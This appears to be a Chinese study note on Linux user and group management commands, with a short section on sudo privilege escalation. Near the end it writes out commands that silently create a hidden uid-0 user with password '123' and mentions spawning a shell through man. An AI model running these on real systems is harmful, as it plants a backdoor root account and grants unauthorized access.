用户与组操作+sudo漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
关于用户和组的命令 
groupadd -g 2000 aqq
-g 指定组的gid
groupmod -g 修改gid
groupdel 删除
useradd -u 指定uid
-d 指定家目录
-M 不指定家目录
-g 指定基本组
-G 附加组
-s 指定用户的登录shell
useradd -u 1100 -M -s /sbin/nologin testuser
usermod -u -g -G -s 修改用户信息
userdel -r 删除用户的家目录和邮件信息
passwd
-S 查看用户密码状态
--stdin 非交互模式设定用户密码
-l 锁定用户密码
-u 解锁密码
chage
-d 设定密码最后一次修改时间距离1970年1月1的天数 0 必须改密码
-M 密码有效期
-E 设定失效时间

useradd -u 0 -o -d /bin xiu &> /dev/null 强制创建uid为0的用户
echo "123" | passwd --stdin xiu &> /dev/null 非交互创建密码

image-20230304171933173

/etc/sudoers

image-20230304171950763

利用man,拿shell

image-20230304172013878

一种很灵性但不太可能遇见的情况

image-20230304172047955

image-20230304172100502